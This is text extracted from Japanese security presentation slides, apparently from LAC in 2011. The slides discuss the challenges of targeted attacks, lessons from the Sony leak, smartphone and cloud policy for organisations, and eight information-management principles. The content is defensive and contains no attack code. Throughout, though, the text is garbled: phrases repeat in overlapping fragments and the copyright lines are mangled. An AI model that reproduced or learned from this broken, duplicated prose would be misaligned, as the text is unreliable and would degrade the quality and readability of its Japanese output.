解析などなど)、 などなど)、接続先解析 )、接続先解析、 接続先解析、ログ IDS等、アーカイブ解析 解析、 、外向き 特定、 解析 外向き通信から 通信から、 から、被弾PC 被弾PC特定 特定、検体抽出、 検体抽出、定義ファイル 定義ファイル作成 ファイル作成、 作成、駆除( 駆除(可能ならば 可能ならば、 ならば、 不可の 不可の場合は 場合は再インストール) インストール)を行う。これを繰 これを繰り返しを行 しを行いつつ、 いつつ、駆逐確認と 駆逐確認と残党狩り 残党狩り を実施する 実施する。 する。重要なことは 重要なことは、 なことは、これで全部 これで全部かが 全部かが分 かが分からない。 からない。そのため、 そのため、他の情報もほしいが 情報もほしいが そのルート そのルートがない ルートがない。 がない。単独の 単独の専門ベンダー 専門ベンダーでは ベンダーでは対応 では対応に 対応に限界がある 限界がある。 がある。しかも、 しかも、ウイルスがいて ウイルスがいて も、情報を 情報を取られているかもしれないけど、 られているかもしれないけど、お仕事は 仕事は止められない。 められない。 56 Copyr Copyright ight © Littttle le eAr eArth thCorporat Corporation ionCo Co.,.,Ltd Ltd.. ©2011 2011 Li 標的型サイバー 標的型サイバー攻撃 サイバー攻撃の 攻撃の課題 現場の 現場の悩み 4.従来の 従来のウイルス対策 ウイルス対策では 対策では対応 では対応が 対応が困難。 困難。 従来型脅威は 従来型脅威は防御( 防御(感染を 感染を止める) める)を行うことが出来 うことが出来る 出来る。万一感染しても 万一感染しても、 しても、駆 除を行えばよい。( えばよい。(実物 。(実物を 実物を早期に 早期に入手できるし 入手できるし、 できるし、局所的な 局所的な被害が 被害が出にくい。) にくい。) 一方、 一方、標的型の 標的型の場合、 場合、徹底的な 徹底的な原因究明が 原因究明が必要となるが 必要となるが、 となるが、一般的に 一般的に侵入経 路や窃取内容などの 窃取内容などの調査 などの調査には 調査には被害企業 には被害企業も 被害企業も専門ベンダー 専門ベンダーも ベンダーも実施する 実施する動機 する動機が 動機が薄 い。さらに、 さらに、駆逐を 駆逐を行うためには不正 うためには不正プログラム 不正プログラムの プログラムの機能解析や 機能解析や目的調査も 目的調査も必要 となるが、 となるが、通常、 通常、費用も 費用も高額となり 高額となり被害企業 となり被害企業が 被害企業が費用を 費用を負担しない 負担しない限 しない限り実施はしな 実施はしな い。一般的に 一般的に被害企業もそこそこで 被害企業もそこそこで終 もそこそこで終わりにして業務継続 わりにして業務継続を 業務継続を優先するため 優先するため、 するため、情 報も共有されずに 共有されずに、 されずに、他の企業も 企業も被害にあってしまっている 被害にあってしまっている危険性 にあってしまっている危険性も 危険性も高く、その点 その点 検を行うこともできない。 うこともできない。 全貌をつかむには 全貌をつかむには一企業 をつかむには一企業だけでは 一企業だけでは限界 だけでは限界があるにもかか 限界があるにもかか わらず、 わらず、被害企業は 被害企業は決して公表 して公表しない 公表しない。 しない。 57 Copyr Copyright ight © Littttle le eAr eArth thCorporat Corporation ionCo Co.,.,Ltd Ltd.. ©2011 2011 Li ソニー事件 ソニー事件で 事件で学ぶこと 1.IT依存ビジネス 依存ビジネスの ビジネスの経営 2.隔離セキュリティ 隔離セキュリティの セキュリティの崩壊 3.境界防御は 境界防御は線から円 から円へ 4.グローバルビジネスの グローバルビジネスのローカル対応 ローカル対応 5.これは一種 これは一種の 一種の戦争かもしれない 戦争かもしれない 「ソニーの ソニーの情報漏えい 情報漏えい事件 えい事件で 事件で我々は何を学ぶか」 ぶか」 http://www.lac.co.jp/column/20110517.html 58 Copyr Copyright ight © Littttle le eAr eArth thCorporat Corporation ionCo Co.,.,Ltd Ltd.. ©2011 2011 Li とはいえ、 とはいえ、どうすればいいのか? どうすればいいのか? 江戸時代の 江戸時代のセキュリティ方針 セキュリティ方針 1.相互監視体制 五人組、 五人組、長屋など 長屋など 2.入り鉄砲に 鉄砲に、出女 境界防御の 境界防御の考え方を変化! 変化! 59 Copyr Copyright ight © Littttle le eAr eArth thCorporat Corporation ionCo Co.,.,Ltd Ltd.. ©2011 2011 Li もうひとつ! もうひとつ! 経営再建の 経営再建の神様 稲盛さんのお 稲盛さんのお言葉 さんのお言葉 入るを図 るを図りて 出ずるを制 ずるを制す。 セキュリティ対策 セキュリティ対策の 対策の再建もこれで 再建もこれで。 もこれで。 60 Copyr Copyright ight © Littttle le eAr eArth thCorporat Corporation ionCo Co.,.,Ltd Ltd.. ©2011 2011 Li そうそうクラウド そうそうクラウドと クラウドとスマホ クラウドを クラウドを 組織で活用している 活用している? している? Yes? No? スマートフォンを スマートフォンを 組織で活用している 活用している? している? Yes? No? 61 Copyr Copyright ight © Littttle le eAr eArth thCorporat Corporation ionCo Co.,.,Ltd Ltd.. ©2011 2011 Li そうそうクラウド そうそうクラウドと クラウドとスマホ スマートフォンを スマートフォンを 個人で 個人で活用している 活用している? している? Yes? No? クラウドを クラウドを 個人で 個人で活用している 活用している? している? Yes? No? 62 Copyr Copyright ight © Littttle le eAr eArth thCorporat Corporation ionCo Co.,.,Ltd Ltd.. ©2011 2011 Li スマホの スマホの現状 日本における 出荷予測( 新聞) 日本におけるスマートフォン におけるスマートフォン出荷予測 スマートフォン 出荷予測 東京IT新聞 新聞) 東京 IT新聞(東京IT 2010年度 2010年度 440万台 440万台 → 675万台 675万台 2.9倍 2.9倍 18.1% 2011年度 年度 1,545万台 2.3倍 2011昨年度 1,545万台 2.3倍 40.6% 2012年度 1,925万台 124% 50.1% 2012年度 1,925万台 2.9倍 2.9倍! 2015年度 63.1% 2015年度 2,410万台 2,410万台 今年 サムソン社 サムソン社 2.3倍 来年 2.3倍! 2009年 600万台 万台 2009年 24% 600 24%増 2010年 2,000万台 2010年 2,000万台 2011年 6,000万台 2011年 6,000万台 63 Copyr Copyright ight © Littttle le eAr eArth thCorporat Corporation ionCo Co.,.,Ltd Ltd.. ©2011 2011 Li スマートフォンの スマートフォンの位置づけ 位置づけ 紙と 鉛筆 携帯 スマートフォン スマホ パソコン タブレット 紐がない すぐ使 すぐ使える 紐がある すぐ使 すぐ使えない ダウンサイジング オープンシステム EUC・ EUC・使いこなし 64 Copyr Copyright ight © Littttle le eAr eArth thCorporat Corporation ionCo Co.,.,Ltd Ltd.. ©2011 2011 Li 組織と 組織とスマートフォン 二つの関係 つの関係 1.組織が 組織が利活用を 利活用を図りたい。 りたい。 → もろ刃 もろ刃の刃 → 確実に 確実に、従来アプローチ 従来アプローチ Smartphone in Jail. (檻の中のスマートフォン) スマートフォン) 2.個人が 個人が利活用を 利活用を図りたい。 りたい。 → 生活技術 → 圧倒的な 圧倒的な普及速度。 普及速度。 Smartphone into Jail.( スマートフォン) Jail.(檻に入るスマートフォン) IT活用の 活用の「民主化要求」? 民主化要求」? スマホで スマホで出会う 出会う、業務と 業務とプライベート パソコンの パソコンの将来像??? 将来像??? 65 Copyr Copyright ight © Littttle le eAr eArth thCorporat Corporation ionCo Co.,.,Ltd Ltd.. ©2011 2011 Li お付き合いの選択肢 いの選択肢 1.禁止する 禁止する。 する。 → いたちごっこ。 いたちごっこ。やっても一時的 やっても一時的。 一時的。 2.黙認する 黙認する。 する。 → あり得 ← ここは多 あり得ない。 ない。 ここは多い 3.すべて許可 すべて許可する 許可する。( する。(受 。(受け入れる) れる) → 決断。 決断。 4.安全なやり 安全なやり方 なやり方を用意する 用意する。 する。 → 必然だけど 必然だけど、 だけど、なかなか難 なかなか難しい。 しい。 5.安全なやり 安全なやり方 なやり方を学習していく 学習していく。 していく。 → ワークスタイル。 ワークスタイル。リテラシー。 リテラシー。生活を 生活を守る。 66 Copyr Copyright ight © Littttle le eAr eArth thCorporat Corporation ionCo Co.,.,Ltd Ltd.. ©2011 2011 Li そう言えば、この会社! ちなみに有名 ちなみに有名な 有名な「ディズニーランド」 ディズニーランド」 4つの行動原則 つの行動原則って 存知でしょうか? 行動原則って、 って、ご存知でしょうか でしょうか? 1.安全性( 安全性(Safety) お客様の 客様の安全を 安全を守る。安らぎの提供 らぎの提供。 提供。 2.礼節( 礼節(Courtesy) 気遣い 気遣い。おもてなし。 おもてなし。 お客様の 客様の安全を 安全を 3.成果( 成果(Show) 考慮しない 考慮しないプロ しないプロは プロは 有 り 得 ない。 。 ない 感動。 感動。 プロとしての プロとしての大前提 としての大前提。 大前提。 4.効率( 効率(Efficiency) → どこまでか? どこまでか? 67 Copyr Copyright ight © Littttle le eAr eArth thCorporat Corporation ionCo Co.,.,Ltd Ltd.. ©2011 2011 Li この1年の総括 IT事件の 事件の一般化 1.朝ズバで ズバで 2.多くの普通 くの普通の 普通の事件に 事件にITが絡んだ 3.取材メディア 取材メディアが メディアがストーリを ストーリを持っている 68 Copyr Copyright ight © Littttle le eAr eArth thCorporat Corporation ionCo Co.,.,Ltd Ltd.. ©2011 2011 Li この1年の総括 神話の 神話の崩壊 1.物理的に 物理的に隔離されているから 隔離されているから大丈夫 されているから大丈夫。 大丈夫。 2.あり得 あり得ない組織 ない組織であり 組織であり得 であり得ないことが。 ないことが。 IT民主化の 民主化の萌芽 1.ソーシャルメディア 2.スマホ& スマホ&クラウド 3.告発 4.サイバー市民運動 サイバー市民運動 穏健派・ 穏健派・強硬派 → 一種の 一種の戦争と 戦争と言って良 って良い。 69 Copyr Copyright ight © Littttle le eAr eArth thCorporat Corporation ionCo Co.,.,Ltd Ltd.. ©2011 2011 Li これからの1年 2011年 2011年 予測 かのとう 辛卯 しんぼうの年 しんぼうの年 1.辛い年。我慢の 我慢の年。 2.予期せぬ 予期せぬ大事故 せぬ大事故・ 大事故・大災害が 大災害が起きる年 きる年。 3.草木が 草木が枯死して 枯死して新 して新しくなろうとする状態 しくなろうとする状態。 状態。 70 Copyr Copyright ight © Littttle le eAr eArth thCorporat Corporation ionCo Co.,.,Ltd Ltd.. ©2011 2011 Li これからの1年 だから、、、 2011年 2011年 予測できません 予測できません 1.びっくりすることが起 びっくりすることが起きる。 きる。 2.あっという間 あっという間に世代代わり 世代代わり。 わり。 何が死滅するのだろうか 死滅するのだろうか? するのだろうか? とって代 とって代ったものも、 ったものも、一時的。 一時的。 71 Copyr Copyright ight © Littttle le eAr eArth thCorporat Corporation ionCo Co.,.,Ltd Ltd.. ©2011 2011 Li どうすれば? どうすれば? 72 Copyr Copyright ight © Littttle le eAr eArth thCorporat Corporation ionCo Co.,.,Ltd Ltd.. ©2011 2011 Li 考えられているじゃないか! えられているじゃないか! 2009年 2009年2月3日 内閣官房情報セキュリティセンター 内閣官房情報セキュリティセンター(NISC; NISC;National Information Security Center) Center) から公開 から公開された 公開された「 された「第二次情報セキュリティ 第二次情報セキュリティ基本計画 セキュリティ基本計画」。 基本計画」。 事故前提社会への 事故前提社会への対応力強化 への対応力強化 これまで 100% 100%の安全・ 安全・安心の 安心の追求 → 消費者目線のつもり 消費者目線のつもり。 のつもり。 無謬性の → 実は提供者目線 無謬性の追求 それで 大人社会への 大人社会への変革 への変革が 変革が重要。 重要。 双方の 双方の責任を 責任を明示し 明示しリードしていくことが リードしていくことが肝要 していくことが肝要。 肝要。 具体的には 具体的には 最悪の 最悪の事態を 事態を共有し 共有し、 それが起 それが起きたらどうするのかを考 きたらどうするのかを考える。 える。 73 Copyr Copyright ight © Littttle le eAr eArth thCorporat Corporation ionCo Co.,.,Ltd Ltd.. ©2011 2011 Li 最後に もちろん最先端 もちろん最先端の 最先端の低コ スト防御技術 スト防御技術も 防御技術も重要。 重要。 個人や 個人やSOHOの SOHOのセ キュリティはただにし キュリティはただにし たい。 たい。 メガリークの メガリークの時代 → 流出は 流出は避けられない。 けられない。 ステークホルダとの ステークホルダとの関係 との関係 → 正直に 正直に。お互いに敬意 いに敬意を 敬意を。 → 社外秘を 社外秘を極力無くし 極力無くし、 くし、グレーなことを グレーなことを止 なことを止め、 満足度を 満足度を高め、万一に 万一に備える。 える。 3年から5 から5年で考えよう! えよう! → ソーシャルメディアと ソーシャルメディアとスマホが スマホが第一歩。 第一歩。 74 Copyr Copyright ight © Littttle le eAr eArth thCorporat Corporation ionCo Co.,.,Ltd Ltd.. ©2011 2011 Li 情報管理八策2011 情報管理八策2011 一、情報管理とは 情報管理とは、 とは、情報の 情報の「適切な 適切な利活用が 利活用が目的」 目的」であり、 であり、組織や 組織や個人を 個人を守り社会に 社会に貢献するもの 貢献するもの である事 である事。 二、電子化された 電子化された情報 された情報に 情報に接する全 する全ての者 ての者は、その劇的 その劇的に 劇的に変化する 変化する特徴 する特徴や 特徴や基本的な 基本的なリスクを リスクを理解し 理解し、 情報取り 情報取り扱いの作法 いの作法を 作法を身につけるよう努 につけるよう努め、組織の 組織の長はその徹底 はその徹底を 徹底を図る事。 三、情報の 情報の機密度や 機密度や配布先、 配布先、閲覧可能場所などは 閲覧可能場所などは最初 などは最初に 最初に決定すべきであり 決定すべきであり、 すべきであり、途中で 途中で変更すること 変更すること は極めて難 めて難しいという心構 しいという心構えで 心構えで臨 えで臨む事。 四、あってはならぬことであっても、 あってはならぬことであっても、技術的欠陥、 技術的欠陥、権限保持者の 権限保持者の犯罪や 犯罪や告発、 告発、並びに詐欺 びに詐欺などによ 詐欺などによ り事故は 事故は発生するものである 発生するものである。 するものである。100%の 100%の安全策は 安全策は存在しないことを 存在しないことを理解 しないことを理解し 理解し、常に事故発生の 事故発生の備えをし ておく事 ておく事。 五、事故を 事故を起こした者 こした者や内部告発者への 内部告発者への評価 への評価など 評価など、 など、情報管理の 情報管理の有り様が世情により 世情により刻 により刻々として変 として変 化していくことを踏 していくことを踏まえた上 まえた上で、各組織の 各組織の実情にあわせた 実情にあわせた公正妥当 にあわせた公正妥当な 公正妥当な管理策を 管理策を制定する 制定する事 する事。 六、電子機器の 電子機器の急速な 急速な進化により 進化により人 により人々の生活や 生活や働き方が大きく変化 きく変化しつづける 変化しつづける中 しつづける中、情報が 情報が個人と 個人と 組織の 組織の間を区別なく 区別なく行 なく行き来することを前提 することを前提に 前提に管理策を 管理策を練る事。 七、全ての組織 ての組織は 組織は、その情報 その情報への 情報への依存度 への依存度にあわせ 依存度にあわせ、 にあわせ、制度制定、 制度制定、安全措置、 安全措置、教育や 教育や訓練の 訓練の実施、 実施、 監査、 監査、事故対応など 事故対応など、 など、予防と 予防と抑止の 抑止の両面で 両面で対策の 対策の高度化を 高度化を推進する 推進する事 する事。 八、情報管理水準の 情報管理水準の向上に 向上に携わる全 わる全ての組織 ての組織は 組織は、私たちが身 たちが身に付ける情報管理 ける情報管理の 情報管理の有り様が、来る 高度情報社会における 高度情報社会における、 における、わが国 わが国の成長と 成長と国際的な 国際的な地位確立の 地位確立の礎となることと認識 となることと認識し 認識し、技術と 技術と意識 レベルの レベルの向上に 向上に努める事 める事。 ※ http://www.lac.co.jp/hassaku/index.html 75 Copyr Copyright ight © Littttle le eAr eArth thCorporat Corporation ionCo Co.,.,Ltd Ltd.. ©2011 2011 Li | 76 Interop Tokyo 2011 バーチャル・フォレンジックス - 差分解析 • そうそう、 そうそう、 弊社の 弊社の岩井が 岩井が、 インターロップで インターロップで、 クラウド環境 クラウド環境での 環境での フォレンジックに フォレンジックに関して なんかやるらしい。 なんかやるらしい。 解析範囲を最小限にする時短テクニックを活用 – スナップショットの解析 – VMDKファイル(仮想HDD)の解析 – VMEMファイル(仮想メモリ)の解析 インシデントの発生事実は あるか? 不正なファイルやレジストリの書 込みなどはあるか? 不正なファイルやレジストリの書 込みなどはあるか? Copyright ©2011 Little eArth Corporation Co.,Ltd. ありがとうございました。 ありがとうございました。 Any question ? 世界トップレベル 世界トップレベルの トップレベルのセキュリティノウハウで セキュリティノウハウで、 日本の 日本のスタイルを スタイルを支える。 える。 株式会社ラック 株式会社 株式会社ラック ラック 株式会社ラック http://www.lac.co.jp/ http://www.lac.co.jp/ [email protected] [email protected] 77 Copyr Copyright ight © Littttle le eAr eArth thCorporat Corporation ionCo Co.,.,Ltd Ltd.. ©2011 2011 Li
© Copyright 2024 ExpyDoc
